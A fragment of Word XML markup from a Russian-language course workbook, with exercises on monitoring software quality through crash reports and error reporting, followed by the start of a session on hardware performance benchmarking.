      <w:r w:rsidR="00517F15" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Мониторинг текущих характеристик отраслевого программного обеспечения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="152"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков мониторинга текущих характеристик отраслевого программного обеспечения с помощью техник, основанных на событиях, с помощью статистических техник.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">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517F15" w:rsidRPr="00617AC0" w:rsidRDefault="00517F15" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00517F15" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 1. Мониторинг текущих характеристик отраслевого программного обеспечения с помощью техник, основанных на событиях</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В программировании отчет об ошибке (англ. error report или crash report) – это файл, содержащий техническую информацию об исключительной ситуации (исключении), произошедшей в программе на компьютере пользователя. В терминологии программирования критическая ошибка, которая приводит к аварийному завершению программы (</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>падению</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), также называется крэшем или </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>крашем</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (от англ. crash).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчеты об ошибках часто включают в себя такую информацию, как: тип крэша, образ стека, версия программы, тип центрального процессора, версия операционной системы, а также лог программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Отчет об ошибке обычно создается специальной программой (англ. crash reporter). Целью такой программы является сбор данных о произошедшем крэше и отправка этих данных по сети Интернет некой третьей стороне, обычно этой третьей стороной является производитель программного обеспечения. Отчет об ошибке призван помочь разработчикам </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>программного обеспечения выяснить причину крэша и исправить ее в последующих релизах программного продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows XP включает в себя службу отправки отчетов об ошибке, называемую Windows Error Reporting (не путать с Dr. Watson), которая позволяет оправить отчет об ошибке в компанию Microsoft для онлайн-анализа. Информация отправляется в централизованную базу данных, управляемую Microsoft. Отчет содержит необходимую информацию, которая позволяет разработчику диагностировать причину ошибки и исправить ее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows вероятно имеет наиболее сложную систему анализа ошибок на сегодняшний день, в которой централизованная база данных может быть настроена для сбора дополнительной информации от пользователей, испытывающих определенный тип проблемы. Система охватывает все части процесса отладки и выпуска ПО таким образом, что исправления могут быть применены к ПО на компьютере пользователя автоматически через службу Windows Update.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое error log?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Как можно отслеживать качество продукта с помощью отчетов о ошибках?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какие есть способы получения отчетов об ошибках?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изучить технологию использования событий для мониторинга качества.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создать презентацию, наглядно демонстрирующую преимущества этого метода.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создать презентацию, наглядно демонстрирующую преимущества использования событий для мониторинга качества.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Требования к отчету: Презентация.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00517F15" w:rsidP="00517F15">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="153" w:name="_Toc507788539"/>
      <w:bookmarkStart w:id="154" w:name="_Toc507788264"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 2. </w:t>
      </w:r>
      <w:r w:rsidR="00672A00" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мониторинг текущих характеристик отраслевого программного обеспечения с помощью статистических техник</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="153"/>
    <w:bookmarkEnd w:id="154"/>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В программировании отчет об ошибке (англ. error report или crash report) – это файл, содержащий техническую информацию об исключительной ситуации (исключении), произошедшей в программе на компьютере пользователя. В терминологии программирования критическая ошибка, которая приводит к аварийному завершению программы (</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>падению</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), также называется крэшем или </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>крашем</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (от англ. crash).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчеты об ошибках часто включают в себя такую информацию, как: тип крэша, образ стека, версия программы, тип центрального процессора, версия операционной системы, а также лог программы. Отчет об ошибке обычно создается специальной программой (англ. crash reporter). Целью такой программы является сбор данных о произошедшем крэше и отправка этих данных по сети Интернет некой третьей стороне, обычно этой третьей стороной является производитель программного обеспечения. Отчет об ошибке призван помочь разработчикам программного обеспечения выяснить причину крэша и исправить ее в последующих релизах программного продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows включает в себя службу отправки отчетов об ошибке, называемую Windows Error Reporting (не путать с Dr. Watson), которая позволяет оправить отчет об ошибке в компанию Microsoft для онлайн-анализа. Информация отправляется в централизованную базу данных, управляемую Microsoft. Отчет содержит необходимую информацию, которая позволяет разработчику диагностировать причину ошибки и исправить ее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows вероятно имеет наиболее сложную систему анализа ошибок на сегодняшний день, в которой централизованная база данных может быть настроена для сбора дополнительной информации от пользователей, испытывающих определенный тип проблемы. Система охватывает все части процесса отладки и выпуска ПО таким образом, что исправления могут быть применены к ПО на компьютере пользователя автоматически через службу Windows Update.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое error log?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Как можно отслеживать качество продукта с помощью отчетов о ошибках?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какие есть способы получения отчетов об ошибках?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изучить технологию использования событий для мониторинга качества.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создать презентацию, наглядно демонстрирующую преимущества этого метода.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создать презентацию, наглядно демонстрирующую преимущества использования событий для мониторинга качества.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Требования к отчету: Презентация.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="_Toc26278737"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 18 Тестирование быстродействия аппаратного обеспечения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель работы: </w:t>
      </w:r>
      <w:r w:rsidR="00AD5D04" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">получить навыки использования </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сновны</w:t>
      </w:r>
      <w:r w:rsidR="00AD5D04" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>х</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> методик тестирования быстродействия </w:t>
      </w:r>
      <w:r w:rsidR="00AD5D04" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>аппаратного обеспечения</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Получение объективных (тестовых) данных о быстродействии различных устройств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD5D04" w:rsidRPr="00617AC0" w:rsidRDefault="00AD5D04" w:rsidP="00AD5D04">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67279E" w:rsidRPr="00617AC0" w:rsidRDefault="0067279E" w:rsidP="00AD5D04">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
      <w:r w:rsidR="005834D2" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Тестирование быстродействия аппаратного обеспечения</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD5D04" w:rsidRPr="00617AC0" w:rsidRDefault="00AD5D04" w:rsidP="00AD5D04">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Синтетические и полусинтетические тесты – тесты, основной задачей которых является определение предельно возможной производительности компьютера на относительно несложных, но очень часто используемых операциях. Результаты этих тестов не имеют прямого отношения к быстродействию тестируемой системы в реальном ПО, но могут быть использованы для "экспресс-сравнения" компьютерных систем между собой. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программы, реализующие синтетические и полусинтетические тесты:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="a"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- SiSoftware Sandra;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="a"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
